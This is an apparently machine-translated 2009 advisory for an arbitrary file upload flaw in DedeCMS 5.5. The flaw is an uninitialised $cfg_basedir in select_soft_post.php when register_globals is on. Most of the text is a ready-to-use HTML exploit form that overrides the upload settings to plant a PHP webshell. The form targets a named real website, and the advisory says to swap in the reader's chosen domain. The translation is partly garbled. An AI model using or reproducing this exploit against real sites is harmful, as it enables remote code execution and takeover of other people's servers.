Dedecms select_soft_post. php page the variables are not the initial vulnerability-vulnerability warning-the black bar safety net

2009-10-25T00:00:00
ID MYHACK58:62200925117
Type myhack58
Reporter 佚名
Modified 2009-10-25T00:00:00

Description

Text/ Flyh4t

Affected versions: Dedecms 5.5

漏洞 产生 文件 位于 include\dialog\select_soft_post.php, which is the variable$cfg_basedir not initialized properly, can lead to spare Through the identity authentication and system variable initialization file, cause you can upload any file to the specified directory. It exploits the premise is register_globals=on,you can pass a custom form for related The variable assignment. The code is as follows:

<body xxxxx="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br /> <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'> <input type='hidden' name='activepath' value='/data/cache/' /> <input type='hidden' name='cfg_basedir' value='../../' /> <input type='hidden' name='cfg_imgtype' value='php' /> <input type='hidden' name='cfg_not_allowall' value='txt' /> <input type='hidden' name='cfg_softtype' value='php' /> <input type='hidden' name='cfg_mediatype' value='php' /> <input type='hidden' name='f' value='form1. enclosure' /> <input type='hidden' name='job' value='upload' /> <input type='hidden' name='newname' value='fly.php' /> Select U Shell <input type='file' name='uploadfile' size='2 5' /> <input type='submit' name='sb1' value='determine' /> </form> <br /> It's just a exp for the bug of Dedecms V55...<br /> Need register_globals = on...<br /> Fun the game,get a webshell at /data/cache/fly.php...<br /> </body> </html>

Please modify the form form corresponding to the website domain name.